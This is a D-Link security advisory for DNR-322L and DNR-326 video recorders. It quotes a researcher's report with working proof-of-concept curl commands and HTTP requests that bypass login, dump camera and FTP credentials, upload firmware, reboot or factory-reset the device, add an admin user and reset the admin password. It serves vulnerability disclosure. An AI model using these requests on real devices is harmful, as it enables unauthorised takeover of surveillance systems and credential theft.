Overview
The D-Link DNR-322L Rev. Ax and DNR-326 Rev. Ax with fimrware versions 1.x and older are exposed to multiple vulnerabilities including authentication bypass, remote information disclosure, arbitrary firmware upload vulnerability and denial-of-service vulnerabilities Exploiting these vulnerabilities could result in data being compromised and the system to be unrellaible and untrusted in a live production network.
D-Link Security Incident Reponse Policy
All public communication on this issue will be offered at http://securityadvisories.dlink.com/security/
Our security response team can be contacted for incident information or to report incidents at security@dlink.com
Any non-critical security issue, help in updating firmware, or configuration regarding this issue please contact your D-Link Customer care channel.
Reference
General Disclosure
Security and performance is of the utmost importance to D-Link across all product lines. This is not just through the development process but also through regular firmware updates to comply with the current safety and quality standards. We are proactively working with the sources of these reports as well as continuing to review across the complete product line to ensure that the vulnerabilities discovered are addressed. We will continue to update this page to include the relevant product firmware updates addressing these concerns. In the meantime, you can exercise the below cautions to avoid unwanted intrusion into your D-Link product.
Immediate Recommendations for all D-Link device customers
- If you receive unsolicited e-mails that relates to security vulnerabilities and prompt you to action, please ignore it. When you click on links in such e-mails, it could allow unauthorised persons to access your router. Neither D-Link nor its partners and resellers will send you unsolicited messages where you are asked to click or install something.
- Make sure that your wireless network is secure.
- Do not provide your admin password to anyone. If required we suggest updating the password frequently.
Details
The following information is extracted directly from the author, Bharat Jogi, Qualys, whom reported vulnerability:
1) Authentication bypass vulnerability
Dlink NVR 322L and 326 makes use of javascript to check if the authentication to the server is successful or not. This mechanism can easily be bypassed by intercepting the response from the server and then modifying it to bypass authentication.
To be more precise, most of the web pages call /web/function/function.js using:
document.write("script language=\"javascript\" src=\"../function/function.js?id="+sys_time+"\"><\/script>");
The function.js script does an ajax call as follows to check for authentication:
$.ajax({
type:"POST",
async:true,
cache:false,
url:"/cgi-bin/login_mgr.cgi",
data:{cmd:'ui_check_wto'},
success:function(data){
if (data == "fail")
{
alert(_T('_login','msg5'))
location.replace("/web/login.html");
}
else
document.cookie = "login_lock=false";
}
});
/cgi-bin/login_mgr.cgi replies with "sucsess" if the user is authenticated or "fail" if the user is not.
If the reponse from /cgi-bin/login_mgr.cgi is modified or dropped, we can bypass the authentication. This can and was easily done using burp suite.
Once the authentication is bypassed, we can create a new user by visiting http://<target>/web/account_mgr/account.html.
Also it is possible to change the admin password, once are able to login via the new user that we created.
______________________________________________________________________
2) Remote Unauthenticated Information Disclosure Vulnerability
A) Dlink 322L and 326 are exposed to remote information disclosure vulnerability. It is possible to get credentials and status of all the cameras connected to the Dlink NVR.
POC:
curl 'http://<target>/cgi-bin/cgi_main?cmd=modify&xml=1&rand=98'
<Root>
<IPCamera>
<ChannelIndex>0</ChannelIndex>
<CameraName>Camera1</CameraName>
<HostIP>192.168.0.21</HostIP>
<Port>80</Port>
<Brand>D-Link</Brand>
<BrandID>5</BrandID>
<ModelName>DCS-2102</ModelName>
<CameraChannel>1</CameraChannel>
<Protocol>HTTP</Protocol>
<UserName>admin</UserName>
<Password>abcd1234</Password>
<SupportedProtocols>4</SupportedProtocols>
</IPCamera>
curl 'http://<target>/cgi-bin/cgi_main?cmd=status&xml=1&rand=98'
<?xml version="1.0" encoding="UTF-8" ?>
<ROOT>
<Status>IPC normal</Status>
<TotalChannels>9</TotalChannels>
<IPCam>
<ChannelIndex>0</ChannelIndex>
<CameraName>Camera1</CameraName>
<HostIP>192.168.0.21</HostIP>
<ConnStatus>Connected</ConnStatus>
<RecordStatus>12</RecordStatus>
<Framerate>4.6</Framerate>
<Bitrate>929.2</Bitrate>
</IPCam>
B) Dlink 322L and 326 are exposed to remote information disclosure vulnerability. It is possible to get stored credentials for backup ftp site:
POC:
curl 'http://<target>/cgi-bin/cgi_main?cmd=archiveserver&xml=1&rand=98'
<?xml version="1.0" encoding="UTF-8" ?>
<Root>
<Version></Version>
<ServerCount>1</ServerCount>
<Server type="FTP">
<HostIP>abcd1234.com</HostIP>
<Port>21</Port>
<Username>root</Username>
<Password>12345</Password>
<RemoteFolder>temp</RemoteFolder>
</Server>
</Root>
C) Dlink 322L and 326 are exposed to remote information disclosure vulnerability. It is possible to get the exact version of the installed firmware version:
POC:
curl -d cmd=get_firm_v_xml http://<target>/cgi-bin/system_mgr.cgi
REPLY:
======
1.30.0920.2012
______________________________________________________________________
3) Remote unauthenticated arbitrary firmware upload vulnerability
Dlink 322L and 326 are exposed to remote arbitrary firmware upload vulnerability. Remote unauthenticated attackers can upload a modified malicious version of firmware by accessing the page at http://<target>/cgi-bin/system_mgr.cgi
POC:
POST http://<target>/cgi-bin/system_mgr.cgi HTTP/1.1
Host: <target>
Connection: keep-alive
Content-Length: 28
Accept: */*
Origin: http://<taget>
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31
Content-Type: application/x-www-form-urlencoded
Referer: http://<target>/web/system_mgr/upload.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: m_language=en
cmd=cgi_firmware_init_upload
______________________________________________________________________
4) Remote unathenticated Denial-of-Service Vulnerability
Dlink 322L and 326 are exposed to remote unathenticated Denial-of-Service vulnerability. Remote unauthenticated attackers can cause the NVR to reboot, defualt to factory settings and can shutdown the target.
POC:
curl -d cmd=cgi_restart http://<target>/cgi-bin/system_mgr.cgi
curl -d cmd=cgi_restore http://<target>/cgi-bin/system_mgr.cgi
curl -d cmd=cgi_shutdown http://<target>/cgi-bin/system_mgr.cgi
______________________________________________________________________
5) Remotely create a new USER
POST http://<target>/cgi-bin/account_mgr.cgi HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://<target>/web/account_mgr/admin.html
Accept: application/xml, text/xml, */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: <target>
Content-Length: 49
Connection: Keep-Alive
Pragma: no-cache
cmd=cgi_user_add&name=test2&pw=123456&group=admin
______________________________________________________________________
6) Remote admin password reset:
POST http://<target>/cgi-bin/account_mgr.cgi HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://<target>/web/account_mgr/admin.html
Accept: application/xml, text/xml, */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: <target>
Content-Length: 30
Proxy-Connection: Keep-Alive
Pragma: no-cache
cmd=cgi_chg_admin_pw&pw=123456
Affected Products
Model Name
|
HW Version
|
Current FW Version
|
New FW Version for this exploit fix
|
DNR-322L
|
Ax
|
V1.xx and older
|
|
DNR-326 |
Ax |
V1.xx and older |
|
Security patches for your D-Link Product
These firmware updates address the security vulnerabilities in affected D-Link products. D-Link will update this continually and we strongly recommend all users to install the relevant updates.
As there are different hardware revisions on our products, please check this on your device before downloading the correct corresponding firmware update. The hardware revision information can usually be found on the product label on the underside of the product next to the serial number. Alternatively, they can also be found on the device web configuration.